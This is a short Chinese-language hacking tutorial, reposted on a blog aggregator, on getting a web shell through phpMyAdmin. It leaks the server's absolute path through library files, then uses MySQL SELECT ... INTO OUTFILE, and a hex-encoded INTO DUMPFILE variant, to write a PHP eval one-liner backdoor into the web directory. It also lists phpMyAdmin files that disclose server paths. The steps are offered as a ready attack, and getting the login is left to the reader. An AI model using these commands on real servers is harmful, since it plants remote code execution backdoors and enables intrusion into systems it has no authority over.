mysql数据库中插入一句话
来源:互联网 发布:阿里云校园优惠 编辑:程序博客网 时间:2024/05/17 04:44
1.如何拿到登陆密码. 自己想办法
2.访问 : http://url/phpmyadmin/libraries/select_lang.lib.php 得到物理路径.
3.选择一个Database.运行以下语句.
----start code---Create TABLE a (cmd text NOT NULL);Insert INTO a (cmd) VALUES('<?php eval($_POST[cmd]);?>');select cmd from a into outfile 'x:/phpMyAdmin/libraries/d.php';Drop TABLE IF EXISTS a;----end code---
4.如果没什么意外.对应网站得到webshell
思路与mssql一样,都是建个表,然后在表中插一句话木马,在导出到web目录!
补充:还可以直接用dumpfile来得到shell
select 0x3c3f706870206576616c28245f504f53545b636d645d293f3e into DUMPFILE 'C:/XXX/php.php';
加密部分为 lanker 一句话 密码为 cmd
--------------------------------------------------------------------------------------------------------
phpmyadmin的libraries目录多个文件存在绝对路径泄露漏洞- -
http://target/phpmyadmin/libraries/string.lib.php
http://target/phpmyadmin/libraries/string.lib.php
http://target/phpmyadmin/libraries/database_interface.lib.php
http://target/phpmyadmin/libraries/db_table_exists.lib.php
http://target/phpmyadmin/libraries/display_export.lib.php
http://target/phpmyadmin/libraries/header_meta_style.inc.php
http://target/phpmyadmin/libraries/mcrypt.lib.php
转自:http://www.myhack58.com/Article/html/3/7/2011/30488.htm
0 0
- mysql数据库中插入一句话
- mysql数据库中循环插入
- django 爬虫数据插入到数据库。一句话
- mysql 数据库中不能插入' 怎么办??
- mysql数据库中不能插入中文
- 插入到MySql数据库中乱码问题
- Mysql数据库中不能插入中文
- Mysql数据库中不能插入中文
- 向mysql数据库中插入大文本
- MYSQL将另一个数据库中的列插入当前数据库中
- 【MySql】MySql数据库中插入中文字符,显示乱码解决办法
- 在插入数据库,读写request乱码问题,增加一句话,搞定
- MySql数据库插入乱码
- MySQL数据库插入乱码
- mysql数据库中创建、删除、更新、插入数据、等语句
- 用用sql语句将插入图片到mysql数据库中
- 解决插入到MySql数据库中乱码问题
- java向mysql数据库中插入中文乱码问题解决
- android selector的使用方法2:代码实现
- javascript 截取字符串方法汇总
- Balloon.2.4 —— UI组件之按钮
- linux 挂载usb,cdrom笔记
- mini2440按键驱动分析
- mysql数据库中插入一句话
- 数据库脚本生成
- ios url 编码和解码
- HashMap实现原理分析
- MFC Radio Button笔记
- 1:算数左移<<,2:算数右移>>,3:逻辑右移>>>
- 1
- opengl 纹理贴图左右反了
- Canny边缘检测算法原理及其VC实现详解(二)